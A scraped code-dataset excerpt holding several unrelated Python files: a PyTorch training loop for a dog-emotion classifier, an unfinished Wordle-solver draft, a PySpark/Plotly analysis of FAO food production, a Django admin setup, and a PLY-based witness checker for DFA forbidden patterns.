loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze())\n avgloss += loss\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n batch += 1\n tqdm_epoch.set_postfix(loss=(avgloss / batch).item(), lr=optimizer.param_groups[0]['lr'])\n\n # Calculate metrics\n pred_argmax = logits.argmax(1).detach().cpu().numpy()\n y_true = y.long().squeeze().cpu().numpy()\n acc = accuracy_score(y_true, pred_argmax)\n f1 = f1_score(y_true, pred_argmax, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Train/Loss', loss.item(), epoch_num)\n writer.add_scalar('Train/Accuracy', acc, epoch_num)\n writer.add_scalar('Train/F1-score', f1, epoch_num)\n\n print(f\"Training Error: \\n Accuracy: {(100 * acc):>0.1f}%, Avg loss: {(avgloss / batch).item():>7f} \\n\")\n\n\ndef test(device, epoch_num, logger, writer, dataloader, model, loss_fn, scheduler):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n confusion_pred, confusion_label =[], []\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n # sum up the test loss per batch\n test_loss += loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze()).item()\n # sum up the number of correct predictions per batch\n correct += (logits.argmax(1) == y).type(torch.float).sum().item()\n # predicted labels [Type: A list of lists, list of batches of predictions]\n confusion_pred.append(list(logits.argmax(1).cpu().numpy()))\n # print(\"shape of logits: \", logits.shape)\n\n # actual labels [Type: A list of lists, list of batches of labels]\n confusion_label.append(list(y.cpu().numpy()))\n scheduler.step()\n # loss of each batch\n test_loss /= num_batches\n # accuracy rate\n correct /= size\n # flatten the list of lists into an array\n confusion_pred = np.array(sum(confusion_pred, []))\n # print(\"predictions: \",confusion_pred)\n # flatten the list of lists into an array\n confusion_label = np.array(sum(confusion_label, []))\n\n # Calculate metrics\n acc = accuracy_score(confusion_label, confusion_pred)\n f1 = f1_score(confusion_label, confusion_pred, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Test/Loss', test_loss, epoch_num)\n writer.add_scalar('Test/Accuracy', acc, epoch_num)\n writer.add_scalar('Test/F1-score', f1, epoch_num)\n\n logger.debug(f\"Test Error: \\n Accuracy: {(100*acc):>0.1f}%, Test Avg loss: {test_loss:>8f} \\n\")\n print(f\"Test Error: \\n Accuracy: {(100*acc):>0.1f}%, Test Avg loss: {test_loss:>8f} \\n\")\n logger.debug(confusion_matrix(confusion_label, confusion_pred))\n print(confusion_matrix(confusion_label, confusion_pred))\n\n return 100 * correct, test_loss\n\ndef evaluate(device, epoch_num, logger, writer, dataloader, model, loss_fn, scheduler):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n valid_loss, correct = 0, 0\n confusion_pred, confusion_label =[], []\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n # sum up the test loss per batch\n valid_loss += loss_fn(output=logits, embeddings=embeddings, labels=y.long().squeeze()).item()\n # sum up the number of correct predictions per batch\n correct += (logits.argmax(1) == y).type(torch.float).sum().item()\n # predicted labels [Type: A list of lists, list of batches of predictions]\n confusion_pred.append(list(logits.argmax(1).cpu().numpy()))\n # print(\"shape of logits: \", logits.shape)\n\n # actual labels [Type: A list of lists, list of batches of labels]\n confusion_label.append(list(y.cpu().numpy()))\n scheduler.step()\n # loss of each batch\n valid_loss /= num_batches\n # accuracy rate\n correct /= size\n # flatten the list of lists into an array\n confusion_pred = np.array(sum(confusion_pred, []))\n # print(\"predictions: \",confusion_pred)\n # flatten the list of lists into an array\n confusion_label = np.array(sum(confusion_label, []))\n\n # Calculate metrics\n acc = accuracy_score(confusion_label, confusion_pred)\n f1 = f1_score(confusion_label, confusion_pred, average='weighted')\n\n # Log metrics to TensorBoard\n writer.add_scalar('Validate/Loss', valid_loss, epoch_num)\n writer.add_scalar('Validate/Accuracy', acc, epoch_num)\n writer.add_scalar('Validate/F1-score', f1, epoch_num)\n\n logger.debug(f\"Valid Error: \\n Accuracy: {(100*acc):>0.1f}%, Valid Avg loss: {valid_loss:>8f} \\n\")\n print(f\"Valid Error: \\n Accuracy: {(100*acc):>0.1f}%, Valid Avg loss: {valid_loss:>8f} \\n\")\n logger.debug(confusion_matrix(confusion_label, confusion_pred))\n print(confusion_matrix(confusion_label, confusion_pred))\n\n return 100 * correct, valid_loss\n\n\ndef main():\n # Set up logging and devices\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n log1 = get_logger('log1', './model/weight/log.txt', logging.DEBUG)\n log2 = get_logger('log2', './model/weight/pltdata.txt', logging.DEBUG)\n\n # Set up arguments\n args = get_train_args()\n args.save_dir = util.get_save_dir(args.save_dir, args.name)\n # TensorBoard writer\n writer = SummaryWriter(args.save_dir)\n\n # Check the current arguments to choose model\n print(\"The training weights of this model is saved at \", args.save_dir, '/train/', args.name,\n \"\\n The current `load path` is: \", args.load_path,\n \"\\n The current boolean `freeze` is: \", args.freeze,\n \"\\n The current boolean `training` is: \", args.training,\n \"\\n The current boolean `attention` is: \", args.attention,\n \"\\n The current int `epochs` is: \", args.epochs,\n \"\\n The current str `model_name` is: \", args.model_name,\n \"\\n The current str `loss_name` is: \", args.loss_name, \n \"\\n The current str `augment` is: \", args.augment,\"\\n\")\n\n # Data pre-processor\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n # Data pre-processor\n train_transform = transforms.Compose([\n transforms.RandomRotation(30), # Randomly rotate the image within a range of -30 to 30 degrees\n transforms.RandomHorizontalFlip(), # Randomly flip the image horizontally\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n ])\n\n # Dataset loader\n root_dir = '/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/images'\n train_df, valid_df, test_df = split_dataset(root_dir=root_dir)\n # Augment train and validate dataset if needed\n if str2bool(args.augment) == True:\n train_df = augment(df=train_df,transform=train_transform, dataset=\"train\")\n valid_df = augment(df=valid_df,transform=train_transform, dataset=\"validate\")\n \n training_data = DogExpressionDataset(args=args, root_dir=root_dir, df=train_df, transform=test_transform, dataset=\"Train\")\n valid_data = DogExpressionDataset(args=args, root_dir=root_dir, df=valid_df, transform=test_transform, dataset=\"Validate\")\n test_data = DogExpressionDataset(args=args, root_dir=root_dir, df=test_df, transform=test_transform, dataset=\"Test\")\n\n train_loader = DataLoader(training_data, batch_size=32, shuffle=True, num_workers=2)\n valid_loader = DataLoader(valid_data, batch_size=32, shuffle=False, num_workers=2)\n test_loader = DataLoader(test_data, batch_size=32, shuffle=False, num_workers=2)\n\n print(args.model_name)\n\n if args.model_name == \"VIT_patch16\":\n \"\"\"\"\n args:\n \n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = VIT_patch16(device, str2bool(args.freeze))\n\n elif args.model_name == \"VIT_patch32\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = VIT_patch32(device, str2bool(args.freeze))\n elif args.model_name == \"ResNet_50\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResNet_50(device, str2bool(args.freeze))\n elif args.model_name == \"ResNet_34\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResNet_34(device, str2bool(args.freeze))\n\n elif args.model_name == \"ResVit\":\n \"\"\"\"\n args:\n\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResVit(device, args=args)\n\n else:\n print(\"Sorry, there isn't a model related to this model, please make sure you choose the correct model name\")\n\n\n\n # Load weights if needed\n if args.load_path:\n model2train.load_model(args.load_path) # args.load_path [str][default:None] path to load the weights\n\n # Define loss and optimizer\n if args.loss_name == \"Cross_Entropy\":\n loss = HybridLoss(device, args, temperature=1, alpha=1) \n elif args.loss_name == \"Hybrid_loss\":\n loss = HybridLoss(device, args, temperature=0.3, alpha=0.5)\n print(\"temperature\", 0.3)\n else:\n raise AssertionError(\"No such loss, it has to be either Cross_Entropy or Hybrid_loss\")\n \n optimizer = torch.optim.AdamW(model2train.parameters(), lr=0.00001) # weight_decay=1e-4\n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer,\n lambda x: ((1 + math.cos(x * math.pi / args.epochs)) / 2) * (1 - 0.2) + 0.2)\n best_correct = 0\n\n # Whether to train the whole network\n if str2bool(args.training):\n for t in range(args.epochs):\n print(f\"Epoch {t + 1}\\n-------------------------------\\n\")\n log1.info(f\"Epoch {t + 1}\\n-------------------------------\\n\")\n train(device, t, log1, writer, train_loader, model2train, loss, optimizer)\n test_correct, test_loss = test(device, t, log1, writer, test_loader, model2train, loss, scheduler)\n valid_correct, valid_loss = evaluate(device, t, log1, writer, valid_loader, model2train, loss, scheduler)\n log2.info(str(t) + '___' + str(valid_loss) + '___' + str(valid_correct) + str(test_loss) + str(test_correct) + '\\n')\n if best_correct < test_correct:\n best_correct = test_correct\n model2train.save_model(args.save_dir) # updated args.save_dir at the beginning of the main()\n # torch.save(model2train.state_dict(), \"./model/weight/VIT_patch16_epoch.pth\")\n log1.info(\"Saved PyTorch Model State epoch is \" + str(t) + \" valid_correct = \" + str(valid_correct) + \" test_correct = \" + str(test_correct) + \"\\n\")\n print(\"Saved PyTorch Model State epoch is \" + str(t) + \" valid_correct = \" + str(valid_correct) + \" test_correct = \" + str(test_correct) + \"\\n\")\n print(\"The best accuracy is :\", best_correct)\n else:\n \"\"\"\n Please remember to load a path of weights if you do not want to train\n\n The weights are in the `weights` folder\n \"\"\"\n # Check if there is a path of weights given for loading into the model\n assert args.load_path, \"\\n Please load the weights if you don't wanna train the whole model. \" \\\n \"\\n Please check more details in args.py\"\n correct, test_loss = test(device, 0, log1, writer, test_loader, model2train, loss, scheduler)\n model2train.save_model(args.save_dir) # updated args.save_dir at the beginning of the main()\n # torch.save(model2train.state_dict(), \"./model/weight/VIT_patch16_epoch.pth\")\n log1.info(\"Load trained model without training with epoch \" + \"t=0\" + \" correct = \" + str(correct) + \"\\n\")\n print(\"Load trained model without training with epoch \" + \"t=0\" + \" correct = \" + str(correct) + \"\\n\")\n\n log1.info(\"Done!\\n\")\n print(\"Done!\\n\")\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"GengyaoLiu/UCL_Dissertation_Source_Code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19621780629","text":"def fun1(targets, dictionary):\n target_frequency = {}\n present = {}\n list_length = 0\n for word in targets:\n list_length += 1\n for letter in set(word):\n if letter not in target_frequency:\n target_frequency[letter] = {}\n if letter not in present:\n present[letter] = 0\n present[letter] += 1\n pattern = [letter == other_letter for other_letter in word]\n key = get_key2(pattern)\n if key in target_frequency:\n target_frequency[letter][key] += 1\n else:\n target_frequency[letter][key] = 1\n for letter in target_frequency:\n assert list_length > present[letter]\n target_frequency[letter][0] = list_length - present[letter]\n best_guess = None\n max_score = 0\n for word in dictionary:\n word_length = len(word)\n score = 1\n for letter in set(word):\n compared_frequency = {}\n for pattern in target_frequency[letter]:\n assert len(pattern) == word_length\n guess_pattern = [\n letter == other_letter for other_letter in word]\n target_pattern = list(pattern)\n compared_pattern = [\"unknown\"] * word_length\n for index in range(word_length):\n if guess_pattern[index] and target_pattern[index]:\n compared_pattern[index] = \"exact\"\n guess_pattern[index] = False\n target_pattern[index] = False\n continue\n for guess_index in range(word_length):\n if not guess_pattern[guess_index] or guess_pattern[guess_index] not in target_pattern:\n continue\n for target_index in range(word_length):\n if guess_pattern[guess_index] and target_pattern[target_index]:\n compared_pattern[guess_index] = \"elsewhere\"\n guess_pattern[guess_index] = False\n target_pattern[target_index] = False\n for index in range(word_length):\n if guess[index] and guess[index] not in target:\n compared_pattern[index] = \"absent\"\n key = get_key4(compared_pattern)\n if key in compared_frequency:\n compared_frequency[key] += 1\n else:\n compared_frequency[key] = 1\n score += cross_product(compared_frequency.values())\n if score > max_score:\n best_guess = word\n max_score = score\n return best_guess\n\n\ndef fun2(targets, dictionary):\n best_guess = None\n max_score = 0\n for word in dictionary:\n word_length = len(word)\n score = 1\n for target in targets:\n assert len(target) == word_length\n guess = list(word)\n goal = list(target)\n compared_pattern = [\"unknown\"] * word_length\n for index in range(word_length):\n if guess[index] == goal[index]:\n compared_pattern[index] = \"exact\"\n guess[index] = None\n goal[index] = None\n","repo_name":"dinay-kingkiller/pseudocode","sub_path":"toy/testing/wordle_v3.py","file_name":"wordle_v3.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28973119175","text":"from operator import add\nfrom pyspark.sql import SparkSession\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\nclass FAO_production():\n \n def __init__(self, data, spark):\n self.df = data\n self.sparksession = spark\n \n def list_countries(self):\n '''\n Returns all countries list.\n :return: list\n '''\n test = []\n return self.df.rdd.map(lambda line: line[0]).distinct().collect()\n \n def countries_productions(self):\n return self.df.rdd.map(lambda line: (line[0], [line[5]])).reduceByKey(lambda accum, n: accum + n).collect()\n \n def production_sum(self):\n dicc = {}\n for year in range(1961,2014):\n dicc['Y'+ str(year)] = 'sum'\n\n prod_years = self.df.agg(dicc).schema.names\n prod_sum = self.df.agg(dicc).rdd.map(lambda line: line[0:54]).collect()[0]\n \n Sum = []\n for i,elt in enumerate(prod_years):\n Sum.append([elt[5:9],prod_sum[i]])\n\n Sum_ordered = sorted(Sum, key=lambda tup: tup[0])\n\n return self.sparksession.createDataFrame(Sum_ordered)\n \n def plot_production_sum(self, dataFrame):\n x = [int(row['_1']) for row in dataFrame.select('_1').collect()]\n y = [int(row['_2']) for row in dataFrame.select('_2').collect()]\n\n plt.plot(x,y)\n plt.show()\n \n def get_geo_zone(self, dataSource):\n df_geo = self.sparksession \\\n .read \\\n .format('csv') \\\n .options(header='true', inferSchema='true', delimiter=';') \\\n .load(dataSource)\n\n return self.df.join(df_geo, self.df.Area == df_geo.Country)\n \n def get_prod_by_zones(self, geo_zones_df, year_ini, year_end, zones):\n dicc = {}\n prod_by_zones = {}\n\n for year in range(year_ini, year_end):\n dicc['Y'+ str(year)] = 'sum'\n prod_by_zones[str(year)] = []\n\n for zone in zones:\n prod_years = geo_zones_df.filter(geo_zones_df.Zone == zone).agg(dicc).schema.names\n prod_sum = geo_zones_df.filter(geo_zones_df.Zone == zone).agg(dicc).rdd.map(lambda line: line[0:54]).collect()[0]\n\n Sum = []\n for i, elt in enumerate(prod_years):\n Sum.append([elt[5:9], prod_sum[i]])\n\n Sum_ordered = sorted(Sum, key=lambda tup: tup[0])\n\n for year in Sum_ordered:\n prod_by_zones[year[0]] = prod_by_zones[year[0]] + [(zone, year[1])]\n \n return prod_by_zones\n\n \n \n def plot_production_zones(self, prod_zones_map, year_ini, year_end, color_zones):\n AP=[]\n E=[]\n AS=[]\n A=[]\n SA=[]\n U=[]\n NA=[]\n\n years = [str(x) for x in range(year_ini, year_end)]\n\n for year in years:\n AP.append(prod_zones_map[year][0][1])\n E.append(prod_zones_map[year][1][1])\n AS.append(prod_zones_map[year][2][1])\n A.append(prod_zones_map[year][3][1])\n SA.append(prod_zones_map[year][4][1])\n U.append(prod_zones_map[year][5][1])\n NA.append(prod_zones_map[year][6][1])\n\n fig = go.Figure()\n\n for i, zone in enumerate(list(color_zones.keys())):\n fig.add_trace(go.Bar(\n y=years,\n x=AP,\n name=zone,\n orientation='h',\n marker=dict(\n color=color_zones[zone],\n line=dict(color='black', width=0.25)\n )\n ))\n\n fig.update_layout(barmode='stack')\n fig.show()\n\n def group_prod_world(self, year, country_list):\n year_selected ={'Y' + str(year) :'sum'}\n return self.df.filter(self.df.Area.isin(country_list)).groupBy('Area').agg(year_selected)\n \n def production_world_refact(self, prod_world_grouped, year, country_list):\n panda_df = prod_world_grouped.toPandas()\n\n col = 'sum(Y' + str(year) + ')'\n # year_selected ={'Y' + str(year) :'sum'}\n\n prod = {}\n for country in country_list:\n prod[country] = panda_df.loc[panda_df['Area'] == country, [col][0]]\n \n \n \n # prod[country].agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n \n # self.df.filter(self.df.Area == country).agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n # for elt in list(prod.items()):\n # if prod[elt[0]]== None:\n # prod[elt[0]]=0\n return prod\n\n def production_world(self, year, country_list):\n year_selected ={'Y' + str(year) :'sum'}\n \n prod = {}\n for country in country_list:\n prod[country] = self.df.filter(self.df.Area == country).agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n \n for elt in list(prod.items()):\n if prod[elt[0]]== None:\n prod[elt[0]]=0\n \n return prod\n \n \n def countries_coor(self):\n coor = self.df.select(*( self.df.columns[i] for i in [0,61,62] )).distinct().rdd.map(lambda line: (line[0], line[1], line[2])).collect()\n return self.sparksession.createDataFrame(coor)\n \n \n def plot_production_world(self, dataframe):\n coor = self.countries_coor()\n \n lati = [int(row['_2']) for row in coor.select('_2').collect()]\n long = [int(row['_3']) for row in coor.select('_3').collect()]\n name = [row['_1'] for row in coor.select('_1').collect()]\n\n N = {}\n for i,elt in enumerate(name):\n N[elt] = (lati[i],long[i])\n\n N1 = list(N.items())\n N2 = sorted(N1, key=lambda tup: tup[0]) \n\n produc = list(dataframe.values())\n\n latitude = []\n longitude = []\n names = []\n for elt in N2:\n latitude.append(elt[1][0])\n longitude.append(elt[1][1])\n names.append(elt[0])\n \n fig = go.Figure(data=go.Scattergeo(\n lon = longitude,\n lat = latitude,\n text = names,\n mode = 'markers',\n marker = dict(\n size = 8,\n opacity = 0.8,\n reversescale = False,\n autocolorscale = False,\n symbol = 'square',\n line = dict(\n width=1,\n color='rgba(102, 102, 102)'\n ),\n colorscale = 'Blues',\n cmin = 0,\n color = produc,\n cmax =100000,\n colorbar_title=\"Food production (1000 tonnes)\"\n )))\n\n fig.update_layout(\n title = 'Countries 2013',\n geo = dict(\n scope='world',\n #projection_type='albers usa',\n showland = True,\n landcolor = \"rgb(250, 250, 250)\",\n subunitcolor = \"rgb(217, 217, 217)\",\n countrycolor = \"rgb(217, 217, 217)\",\n countrywidth = 0.5,\n subunitwidth = 0.5\n ),\n )\n\n fig.show()","repo_name":"devonfw-forge/spark-data-and-ci-showcase","sub_path":"FAO/FAO_production.py","file_name":"FAO_production.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27665031185","text":"from django.contrib import admin\nfrom app.models import Estudante, Materia, Mentor, Solicitacao\n\nadmin.site.site_title = \"Admin Ensinas\"\nadmin.site.site_header = \"Administração Ensinas\"\nadmin.site.index_title = \"Administração do Sistema\"\n\n@admin.register(Materia)\nclass MateriaAdmin(admin.ModelAdmin):\n list_display = ('nome',)\n ordering = ('nome',)\n search_fields = ('nome',)\n\n@admin.register(Estudante)\nclass EstudanteAdmin(admin.ModelAdmin):\n list_display = ('nome', 'email')\n ordering = ('nome',)\n search_fields = ('nome', 'email')\n\n@admin.register(Mentor)\nclass MentorAdmin(admin.ModelAdmin):\n list_display = ('nome', 'email', 'aprovado', 'instituicao', 'curso')\n ordering = ('nome', 'email')\n search_fields = ('nome', 'email', 'instituicao', 'curso')\n\n@admin.register(Solicitacao)\nclass SolicitacaoAdmin(admin.ModelAdmin):\n list_display = ('estudante', 'mentor', 'oculto')\n ordering = ('estudante', 'mentor')\n search_fields = ('estudante', 'mentor')","repo_name":"JuliaWharton/Ensinas-backend","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"39723738979","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nThis module provide functionality for checking the correctness of\nwitnesses from the forbidden pattern algorithm.\n\"\"\"\n\n__author__ = \"Alexander Weigl \"\n__date__ = \"2012-06-12\"\n\nfrom dfa import valid_witness\n\nclass WitnessChecker(object):\n \"\"\"\n Describes an checker for witnesses. Can be constructed by a string specification\n and a list of other WitnessChecker.\n\n A WitnessChecker has to implement the protocol:\n\n >>> MyChecker(object):\n >>> def __call__(self, dea, witness):\n >>> raise Exception(\"...\") # if a constraint was violated\n >>> return True # if every constraint was hit\n\n Also __str__ and __repr__ should be implemented for nice printing.\n \"\"\"\n\n def __init__(self, spec=None, usecheckers=None):\n \"\"\"\n \"\"\"\n if usecheckers:\n self.call_checkers = usecheckers\n else:\n self.call_checkers = []\n\n self.spec = spec\n self.checks = []\n\n if spec:\n self.checks = parseSpecification(spec)\n\n def __iadd__(self, other):\n print(\"__iadd__\")\n if type(other) is (list, tuple):\n self.checks += other\n else:\n self.checks.append(other)\n\n def __str__(self):\n string = \"\"\n\n if self.spec:\n string = \"created from spec: \\n %s \\n#end spec\\n\" % self.spec\n\n if self.call_checkers:\n string += \"rules from other checkers:\\n+\" + \"-\" * 20 + \"\\n|\\t\"\n for witness in self.call_checkers:\n string += str(witness).replace(\"\\n\", \"\\n|\\t\") + \"\\n+\" + \"-\" * 20\n\n string += \"\\n\"\n\n if self.checks:\n string += \"checks:\\n\"\n for checker in self.checks:\n string += \"\\t\" + str(checker) + \"\\n\"\n\n return string\n\n def __repr__(self):\n return \"WitnessChecker(%s,%s)\" %\\\n (repr(self.spec), repr(self.call_checkers))\n\n def __call__(self, dea, witness):\n if not valid_witness(witness):\n return False\n\n for chck in self.call_checkers:\n chck(dea, witness)\n\n for checker in self.checks:\n checker(dea, witness)\n\n #False by Exception\n return True\n\n\ndef generateParser():\n import ply.yacc as yacc\n import ply.lex as lex\n\n literals = (\"-\", \",\", '#')\n tokens = [\"DELIM\", \"NAME\", \"ANTI\", \"ARROW\", \"SMALLER\"]\n t_DELIM = r\"(\\n|;)\"\n t_ANTI = r\"<[#]>\"\n t_ARROW = r\"->\"\n t_ignore = \" \\t\"\n t_SMALLER = r\"<=\"\n\n def t_NAME(t):\n r'[a-zA-Z_0-9\\']+'\n return t\n\n # def t_newline(t):\n # r\"\\n+\"\n # t.lexer.lineno += t.value.count(\"\\n\")\n # t.type = \"DELIM\"\n\n\n def t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n print(t)\n t.lexer.skip(1)\n\n\n start = \"cnstrnts\"\n\n def p_cnstrnts_recur(p):\n '''cnstrnts : cnstrnts DELIM def'''\n\n p[1].append(p[3])\n p[0] = p[1]\n\n def p_cnstrnts_anchor(p):\n '''cnstrnts : def'''\n p[0] = list(( p[1], ))\n\n\n def p_def_path(p):\n '''def : NAME '-' NAME ARROW NAME\n | NAME '-' NAME ARROW NAME '-' NAME'''\n if len(p) == 8:\n p[5] = p[5] + \"\\\\\" + p[7]\n p[0] = path(p[1], p[3], p[5])\n\n\n def p_def_antivalence(p):\n '''def : NAME ',' NAME ANTI NAME ',' NAME'''\n p[0] = antivalence(p[1], p[3], p[5], p[7])\n\n def p_def_neq(p):\n '''def : NAME '#' NAME'''\n p[0] = neq(p[1], p[3])\n\n def p_def_alpha(p):\n '''def : NAME SMALLER NAME'''\n p[0] = alpha(p[1], p[3])\n\n\n def p_error(t):\n if t:\n print(\"Syntax error at value '%s' on line %d:%d\" % (t, t.lineno, t.lexpos))\n\n def find_column(input, token):\n last_cr = input.rfind('\\n', 0, token.lexpos)\n if last_cr < 0:\n last_cr = 0\n column = (token.lexpos - last_cr) + 1\n return column\n\n lexer = lex.lex()\n yacc.yacc(debug=False, write_tables=False)\n return yacc\n\n_parser = generateParser()\nparseSpecification = lambda spec: _parser.parse(spec.strip())\n\n\nclass composable(object):\n \"\"\"\n Defines the addition operator for building lists:\n >>> a,b,c = composable(),composable(),composable()\n >>> a + b + c\n [ a , b , c]\n \"\"\"\n\n def __add__(self, other):\n if type(other) in (list,):\n other.append(self)\n return other\n else:\n return list((self, other))\n\n\nclass alpha(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.word1, self.word2 = parseSpecification(args[0])\n else:\n self.word1, self.word2 = args\n\n def _tuple(self):\n return self.word1, self.word2\n\n def __repr__(self):\n return \"alpha('{0} <= {1}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\alpha({0}) \\subseteq \\alpha({1})\".format(*self._tuple())\n\n def __call__(self, dea, witness, msg=\"\"):\n w = witness[self.word1]\n v = witness[self.word2]\n\n if not set(w) <= set(v):\n raise Exception(\"alpha check failed for witness,v = (%s,%s) \" % (witness, v))\n #else:\n # print(str(self), \"is satisfied\")\n return True\n\n\nclass path(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.start, self.words, self.target = parseSpecification(args[0])\n else:\n self.start, self.words, self.target = args\n\n self.start, self.words, self.target = map(str, self._tuple())\n\n def _tuple(self):\n return self.start, self.words, self.target\n\n def __repr__(self):\n return \"path('{0} - {1} -> {2}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\hat \\delta({0}, {1}) = {2}\".format(*self._tuple())\n\n def __call__(self, dea, witness, msg=\"\"):\n #word = []\n #for witness in iterwords(self.words):\n # word += witness[witness]\n try:\n word = witness[self.words]\n\n start_state = witness[self.start]\n end_state = dea(start_state, word)\n\n if self.target == \"F\":\n ret = end_state in dea.F\n elif self.target in (\"Q-F\", \"Q\\\\F\"):\n ret = end_state in (dea.Q - dea.F)\n else:\n target_state = witness[self.target]\n ret = end_state == target_state\n\n if not msg:\n msg = \"%s - %s -> %s\" % (self.start, self.words, self.target)\n\n if not ret:\n raise Exception(\"path check failed: \" + msg)\n #else:\n # print(str(self), \"is satisfied\")\n return True\n\n except KeyError as e:\n print(self._tuple(), witness, e)\n raise Exception(\"witness %s not found\" % e)\n\n\nclass antivalence(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.state1, self.word1, self.state2, self.word2 = parseSpecification(args[0])\n else:\n self.state1, self.word1, self.state2, self.word2 = args\n\n def _tuple(self):\n return self.state1, self.word1, self.state2, self.word2\n\n def __repr__(self):\n return \"path('{0},{1} <#> {2},{3}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\delta({0}, {1}) \\in F <#> \\delta({2},{3}) \\\\in F\".format(*self._tuple())\n\n def __call__(self, dea, witnesses, msg=\"\"):\n # word = []\n # for witness in iterwords(word1):\n # word += self.witness[witness]\n\n try:\n start1 = witnesses[self.state1]\n start2 = witnesses[self.state2]\n word1 = witnesses[self.word1]\n word2 = witnesses[self.word2]\n\n end1 = dea(start1, word1)\n end2 = dea(start2, word2)\n\n if not ((end1 in dea.F) ^ (end2 in dea.F )):\n raise Exception(\"failed: \" + str(self))\n except KeyError as e:\n print(self._tuple(), witnesses, e)\n raise Exception(\"witness %s not found\" % e)\n\n\nclass neq(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.state1, self.state2 = parseSpecification(args[0])\n else:\n self.state1, self.state2 = args\n\n def _tuple(self):\n return self.state1, self.state2\n\n def __repr__(self):\n return \"path('{0} # {1}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if {0} \\\\neq {0}\".format(*self._tuple())\n\n def __call__(self, dea, witness):\n check = witness[self.state1] != witness[self.state2]\n if not check:\n raise Exception(\"neq failed: %s = %s\" % (self.state1, self.state2))\n\n\ncheckWitnessL12 = WitnessChecker(\n \"\"\"\n p - w -> q\n p - z -> F\n q - z -> Q - F\n p # q\n \"\"\"\n)\n\ncheckWitnessB12 = WitnessChecker(\n \"\"\"\n p - v -> p\n q - v -> q\n \"\"\",\n (checkWitnessL12,))\n\ncheckWitnessL1_1 = WitnessChecker(\n \"\"\"\n p - w -> q\n q - v -> p\n p,z <#> q,z\n \"\"\")\n\ncheckWitnessL1_2 = WitnessChecker(\"\"\"\n q - u -> p\n p - v -> r\n r - u -> p\n q - v -> s\n s - u -> t\n t - v -> s\n t,z <#> p,z\n p # t\n \"\"\")\n\n#===============================================================================\n# {'q': 2, 'p': 1, 's': 3, 'r': 0, 'u': 'a', 't': 3, 'f': 3, 'v': 'bb', 'z': 'abb', 'd': 0}\n# 2 - a -> 1\n# 1 - bb -> 0\n# 0 - a -> 1\n# 2 - bb -> 3\n# 3 - a -> 3\n# 3 - bb -> 3\n# 3,abb 1,abb\n# 1 != 3\n#===============================================================================\n\ncheckWitnessB1 = WitnessChecker(\"\"\"\n q1 - y -> q2\n q2 - y' -> q1\n q1 - w -> q1\n q2 - w' -> q2\n q1 - u -> q3\n q3 - v -> q5\n q5 - u -> q3\n q3 - w -> q3\n q5 - w' -> q5\n q2 - v -> q4\n q4 - u -> q6\n q6 - v -> q4\n q4 - w -> q4\n q6 - w' -> q6\n q3,z <#> q6,z \n\"\"\")\n\ncheckWitnessL32 = WitnessChecker(\"\"\"\n p - v -> p\n q - v -> q\n p - w -> q\n p,z <#> q,z \n w <= v\n\"\"\")\n\ndef t(dea, witness):\n try:\n return checkWitnessL1_1(dea, witness[0]) and checkWitnessL1_2(dea, witness[1]),\n except Exception as e:\n raise e\n\nCHECKERS = {\n 'l12': checkWitnessL12,\n 'b12': checkWitnessB12,\n 'l1': t, #lambda dea, witness: checkWitnessL1_1(dea,witness[0]) and checkWitnessL1_2(dea,witness[1]),\n 'b1': checkWitnessB1,\n 'l32': checkWitnessL32, }\n\nif __name__ == \"__main__\":\n print(\"Witness Checkers:\")\n print(repr(checkWitnessL12))\n print(checkWitnessB12)\n print(checkWitnessL1_1)\n print(checkWitnessL1_2)\n 